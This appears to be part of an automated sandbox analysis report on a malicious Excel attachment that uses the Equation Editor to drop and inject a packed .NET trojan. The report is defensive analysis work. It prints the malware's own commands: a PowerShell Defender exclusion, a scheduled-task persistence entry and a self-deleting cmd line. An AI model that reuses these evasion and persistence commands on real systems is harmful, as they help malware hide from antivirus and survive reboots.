Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFC90 NtUnmapViewOfSection,LdrInitializeThunk,		9_2_00ACFC90
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFC60 NtMapViewOfSection,LdrInitializeThunk,		9_2_00ACFC60
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFD8C NtDelayExecution,LdrInitializeThunk,		9_2_00ACFD8C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFDC0 NtQuerySystemInformation,LdrInitializeThunk,		9_2_00ACFDC0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFEA0 NtReadVirtualMemory,LdrInitializeThunk,		9_2_00ACFEA0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		9_2_00ACFED0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFFB4 NtCreateSection,LdrInitializeThunk,		9_2_00ACFFB4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD0060 NtQuerySection,		9_2_00AD0060
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD01D4 NtSetValueKey,		9_2_00AD01D4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD010C NtOpenDirectoryObject,		9_2_00AD010C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD07AC NtCreateMutant,		9_2_00AD07AC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD0C40 NtGetContextThread,		9_2_00AD0C40
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD10D0 NtOpenProcessToken,		9_2_00AD10D0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD1148 NtOpenThread,		9_2_00AD1148
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACF8CC NtWaitForSingleObject,		9_2_00ACF8CC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACF938 NtWriteFile,		9_2_00ACF938
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD1930 NtSetContextThread,		9_2_00AD1930
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFAB8 NtQueryValueKey,		9_2_00ACFAB8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFA20 NtQueryInformationFile,		9_2_00ACFA20
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFA50 NtEnumerateValueKey,		9_2_00ACFA50
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFBE8 NtQueryVirtualMemory,		9_2_00ACFBE8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFB50 NtCreateKey,		9_2_00ACFB50
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFC30 NtOpenProcess,		9_2_00ACFC30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFC48 NtSetInformationFile,		9_2_00ACFC48
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD1D80 NtSuspendThread,		9_2_00AD1D80
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFD5C NtEnumerateKey,		9_2_00ACFD5C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFE24 NtWriteVirtualMemory,		9_2_00ACFE24
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFFFC NtCreateProcessEx,		9_2_00ACFFFC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFF34 NtQueueApcThread,		9_2_00ACFF34
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0036A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,		9_2_0036A036
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0036A042 NtQueryInformationProcess,		9_2_0036A042
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025900C4 NtCreateFile,LdrInitializeThunk,		11_2_025900C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025907AC NtCreateMutant,LdrInitializeThunk,		11_2_025907AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		11_2_0258FAD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk,		11_2_0258FAE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FAB8 NtQueryValueKey,LdrInitializeThunk,		11_2_0258FAB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FB50 NtCreateKey,LdrInitializeThunk,		11_2_0258FB50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk,		11_2_0258FB68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk,		11_2_0258FBB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258F900 NtReadFile,LdrInitializeThunk,		11_2_0258F900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258F9F0 NtClose,LdrInitializeThunk,		11_2_0258F9F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		11_2_0258FED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FFB4 NtCreateSection,LdrInitializeThunk,		11_2_0258FFB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk,		11_2_0258FC60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk,		11_2_0258FDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FD8C NtDelayExecution,LdrInitializeThunk,		11_2_0258FD8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02590048 NtProtectVirtualMemory,		11_2_02590048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02590078 NtResumeThread,		11_2_02590078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02590060 NtQuerySection,		11_2_02590060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025910D0 NtOpenProcessToken,		11_2_025910D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02591148 NtOpenThread,		11_2_02591148
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0259010C NtOpenDirectoryObject,		11_2_0259010C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025901D4 NtSetValueKey,		11_2_025901D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FA50 NtEnumerateValueKey,		11_2_0258FA50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FA20 NtQueryInformationFile,		11_2_0258FA20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FBE8 NtQueryVirtualMemory,		11_2_0258FBE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258F8CC NtWaitForSingleObject,		11_2_0258F8CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258F938 NtWriteFile,		11_2_0258F938
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02591930 NtSetContextThread,		11_2_02591930
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FE24 NtWriteVirtualMemory,		11_2_0258FE24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FEA0 NtReadVirtualMemory,		11_2_0258FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FF34 NtQueueApcThread,		11_2_0258FF34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FFFC NtCreateProcessEx,		11_2_0258FFFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FC48 NtSetInformationFile,		11_2_0258FC48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02590C40 NtGetContextThread,		11_2_02590C40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FC30 NtOpenProcess,		11_2_0258FC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FC90 NtUnmapViewOfSection,		11_2_0258FC90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0258FD5C NtEnumerateKey,		11_2_0258FD5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02591D80 NtSuspendThread,		11_2_02591D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AA370 NtCreateFile,		11_2_000AA370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AA420 NtReadFile,		11_2_000AA420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AA4A0 NtClose,		11_2_000AA4A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AA550 NtAllocateVirtualMemory,		11_2_000AA550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AA36B NtCreateFile,		11_2_000AA36B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AA41A NtReadFile,		11_2_000AA41A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AA49C NtClose,		11_2_000AA49C

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: OmnbtuhFsJys.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Sample is known by Antivirus

Source: Payment Details.xlsx	Virustotal: Detection: 36%
Source: Payment Details.xlsx	ReversingLabs: Detection: 33%

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Found command line output

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................................................0.......#.......................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................................................0.......#.......x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................................................0......./.......................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................................................0......./.......x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............................<.......................0.......;...............|.......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............................W.......................0.......;.......x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......x.......".......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....................................................0.......G.......x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................................................0.......S.......................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................................................0.......S.......x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......s.J.y.s...e.x.e.................................................0......._.......x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.............................:.......................0......._.......x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............................q.......................0.......k.......................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................................................0.......k.......x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....................................................0.......w.......x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0.......................l.......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0...............x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............................@.......................0...............x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................[.......................0...............x...............................			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ..................(...............(.....(.P.....0.......(...............G.......................................................................			Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Payment Details.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD45E.tmp

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@13/26@1/2

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp			Jump to behavior

Runs a DLL by calling functions

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Binary contains paths to development resources

Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000003.473074012.0000000000930000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.472123384.00000000007D0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.509705783.0000000000C40000.00000040.00000001.sdmp, rundll32.exe
Source:	Binary string: rundll32.pdb source: vbc.exe, 00000009.00000002.508502052.00000000006F9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.506009358.0000000000030000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: vbc[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: OmnbtuhFsJys.exe.4.dr, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.80000.4.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.80000.5.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.80000.3.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.80000.9.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.80000.1.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.80000.7.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.80000.2.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002F1298 push esp; retn 0023h		4_2_002F1321
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002F9B39 push ss; ret		4_2_002F9B40
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002F9B02 push ebx; ret		4_2_002F9B03
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002F8F9A push edx; ret		4_2_002F8F9B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_004171DD push eax; retf		9_2_004171DE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00417AC9 push edi; retf		9_2_00417ACE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A2E3 pushad ; iretd		9_2_0041A2E4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D4C5 push eax; ret		9_2_0041D518
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D57C push eax; ret		9_2_0041D582
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D512 push eax; ret		9_2_0041D518
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D51B push eax; ret		9_2_0041D582
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ADDFA1 push ecx; ret		9_2_00ADDFB4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0036E9B5 push esp; retn 0000h		9_2_0036EAE7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0036EB1E push esp; retn 0000h		9_2_0036EB1F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0036EB02 push esp; retn 0000h		9_2_0036EB03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0259DFA1 push ecx; ret		11_2_0259DFB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000A71DD push eax; retf		11_2_000A71DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AA2E3 pushad ; iretd		11_2_000AA2E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AD4C5 push eax; ret		11_2_000AD518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AD51B push eax; ret		11_2_000AD582
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AD512 push eax; ret		11_2_000AD518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AD57C push eax; ret		11_2_000AD582
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000A7AC9 push edi; retf		11_2_000A7ACE

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 7.77362197724
Source: initial sample	Static PE information: section name: .text entropy: 7.77362197724
Source: initial sample	Static PE information: section name: .text entropy: 7.77362197724

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\Public\vbc.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEB

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
